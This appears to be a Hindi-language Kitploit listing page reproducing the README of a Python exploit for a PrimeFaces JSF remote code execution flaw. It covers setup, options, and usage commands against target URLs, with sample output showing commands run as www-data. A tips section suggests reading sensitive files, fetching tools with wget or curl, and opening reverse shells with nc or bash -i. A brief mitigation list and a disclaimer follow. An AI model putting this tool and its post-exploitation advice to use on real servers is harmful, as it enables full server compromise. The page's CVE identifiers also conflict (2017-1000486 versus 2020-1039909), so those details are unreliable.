Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-1000486 — # CVE-2020-1039909 के लिए Python-आधारित एक्सप्लॉइट, Primefaces JSF में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता। पैडिंग ओरेकल हमले के माध्यम से मनमाने कमांड निष्पादित करता है, जिसमें प्रॉक्सी, कुकीज़ और POC मोड के विकल्प शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/byt3l0rd/cve-2017-1000486
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणक्रिप्टोग्राफीपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubbyt3l0rd/cve-2017-1000486

CVE-2017-1000486

# CVE-2020-1039909 के लिए Python-आधारित एक्सप्लॉइट, Primefaces JSF में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता। पैडिंग ओरेकल हमले के माध्यम से मनमाने कमांड निष्पादित करता है, जिसमें प्रॉक्सी, कुकीज़ और POC मोड के विकल्प शामिल हैं।

रिपॉजिटरी देखें
11घं 18मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

README - CVE-2020-1039909 Primefaces रिमोट कोड एक्सीक्यूशन

============================================================

भेद्यता के बारे में

CVE-2020-1039909 Primefaces JSF फ्रेमवर्क में रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता है। यह दोष एक पैडिंग ओरेकल हमले के माध्यम से हमलावर को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है, जो कमजोर एन्क्रिप्शन और डिफ़ॉल्ट पासवर्ड के उपयोग के कारण होता है।

प्रभावित संस्करण:

  • Primefaces 5.2.21 से पहले के संस्करण
  • Primefaces 5.3.x जो 5.3.8 से पहले के हैं
  • Primefaces 6.x जो 6.0 से पहले के हैं

प्रभाव:

  • रिमोट कोड एक्सीक्यूशन (RCE)
  • सर्वर का पूर्ण समझौता
  • ऑपरेटिंग सिस्टम तक पहुंच
  • संभावित बैकडोर इंस्टॉलेशन

============================================================

पूर्व-आवश्यकताएँ

  • भेद्य Primefaces चला रहा लक्ष्य
  • Python 3.6+
  • लाइब्रेरीज़: requests, pycryptodome, paddingoracle

निर्भरताओं की स्थापना:

pip install requests pycryptodome paddingoracle

============================================================

उपलब्ध कमांड

मूल पैरामीटर:

target लक्ष्य का URL (उदा: http://target.com) -pw, --password Primefaces पासवर्ड (डिफ़ॉल्ट: primefaces) -pt, --path dynamiccontent.properties का पथ (डिफ़ॉल्ट: /javax.faces.resource/dynamiccontent.properties.xhtml) -c, --cmd निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: whoami) -poc, --poc परीक्षण पेलोड का उपयोग करें (केवल भेद्यता जांचता है) -px, --proxy प्रॉक्सी कॉन्फ़िगर करें (उदा: http://127.0.0.1:8080) -ck, --cookie कुकी कॉन्फ़िगर करें -o, --oracle पैडिंग ओरेकल हमला सक्रिय करें (1 = सक्रिय, 0 = निष्क्रिय) (डिफ़ॉल्ट: 0) (धीमा) -pl, --payload एन्क्रिप्टेड EL पेलोड (पैडिंग ओरेकल के साथ उपयोग के लिए)

============================================================

उपयोग के उदाहरण

  1. मूल कमांड निष्पादित करें (whoami)

python3 exploit.py http://target.com

  1. विशिष्ट कमांड निष्पादित करें

python3 exploit.py http://target.com -c "id"

  1. जांचें कि लक्ष्य भेद्य है या नहीं (POC मोड)

python3 exploit.py http://target.com --poc

  1. प्रॉक्सी का उपयोग करें (Burp Suite)

python3 exploit.py http://target.com -px http://127.0.0.1:8080

  1. कुकी के साथ उपयोग करें

python3 exploit.py http://target.com -ck "JSESSIONID=xxx"

  1. पैडिंग ओरेकल का उपयोग करें (धीमा, लेकिन अधिक प्रभावी)

python3 exploit.py http://target.com -o 1 -c "whoami"

  1. पहले से उत्पन्न पेलोड का उपयोग करें

python3 exploit.py http://target.com -pl "payload_criptografado"

============================================================

आउटपुट का उदाहरण

$ python3 exploit.py http://target.com -c "id"

[] Generated Encrypted Payload: xyz123... [] Attempting to execute: id

POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 ...

HTTP/1.1 200 OK ...

[+] Exploit Result:

HTTP/1.1 200 OK ...

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================

POC मोड (भेद्यता परीक्षण)

POC मोड केवल यह जांचता है कि लक्ष्य भेद्य है या नहीं, बिना खतरनाक कमांड निष्पादित किए:

python3 exploit.py http://target.com --poc

भेद्य होने पर अपेक्षित आउटपुट:

[+] BANG!!! :D - Target IS VULNERABLE!!!

भेद्य न होने पर आउटपुट:

[-] Target Probably NOT VULNERABLE :-(

============================================================

पैडिंग ओरेकल (धीमा मोड)

यदि डिफ़ॉल्ट हमला काम नहीं करता है (खाली प्रतिक्रिया बॉडी), तो पैडिंग ओरेकल मोड आज़माएं। यह मोड धीमा है लेकिन अधिक प्रभावी है:

python3 exploit.py http://target.com -o 1 -c "whoami"

============================================================

प्रॉक्सी और डीबग

Burp Suite के साथ अनुरोधों का विश्लेषण करने के लिए:

python3 exploit.py http://target.com -px http://127.0.0.1:8080

============================================================

सामान्य त्रुटियाँ और समाधान

"Response body empty... Target might not be vulnerable" पैडिंग ओरेकल मोड आज़माएं: -o 1

"Target Probably NOT VULNERABLE" लक्ष्य पैच किया गया हो सकता है या डिफ़ॉल्ट पासवर्ड का उपयोग नहीं करता है

"Connection refused" जांचें कि लक्ष्य सुलभ है या नहीं

"SSL Error" https के बजाय http का उपयोग करें या प्रमाणपत्रों को अनदेखा करें

============================================================

एक्सप्लोरेशन के लिए सुझाव

  • सिस्टम का पता लगाने के लिए कई कमांड आज़माएं
  • वर्तमान उपयोगकर्ता की पहचान करने के लिए whoami का उपयोग करें
  • अनुमतियाँ देखने के लिए id का उपयोग करें
  • फ़ाइलें सूचीबद्ध करने के लिए ls का उपयोग करें
  • संवेदनशील फ़ाइलें पढ़ने के लिए cat का उपयोग करें
  • अतिरिक्त टूल डाउनलोड करने के लिए wget या curl का उपयोग करें
  • रिवर्स शेल प्राप्त करने के लिए nc या bash -i का उपयोग करें

============================================================

अस्वीकरण

यह सॉफ़्टवेयर शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस टूल के दुरुपयोग से उत्पन्न किसी भी क्षति, हानि या परिणाम के लिए लेखक जिम्मेदार नहीं है।

उपयोगकर्ता अपने कार्यों के लिए पूरी तरह जिम्मेदार है। बिना अधिकार के सिस्टम पर इस एक्सप्लॉइट का उपयोग अवैध है और इसके परिणामस्वरूप सिविल और आपराधिक दंड हो सकते हैं।

जिम्मेदारी और नैतिकता के साथ उपयोग करें। ज्ञान साझा करने के लिए है, लेकिन बुद्धिमत्ता यह जानने में है कि इसका उपयोग कैसे और कब करना है।

============================================================

शमन (प्रशासकों के लिए)

  1. Primefaces को नवीनतम संस्करण में अपडेट करें
  2. Primefaces का डिफ़ॉल्ट पासवर्ड बदलें
  3. संचार एन्क्रिप्ट करने के लिए HTTPS का उपयोग करें
  4. दुर्भावनापूर्ण पेलोड को ब्लॉक करने के लिए WAF लागू करें
  5. यदि आवश्यक न हो तो dynamiccontent.properties सुविधा अक्षम करें

============================================================

संदर्भ

  • CVE-2020-1039909: https://nvd.nist.gov/vuln/detail/CVE-2020-1039909
  • Primefaces Security Advisory
  • Padding Oracle Attack (CVE-2017-1000486)

============================================================

Developed by byt3l0rd

टूल डाउनलोड करें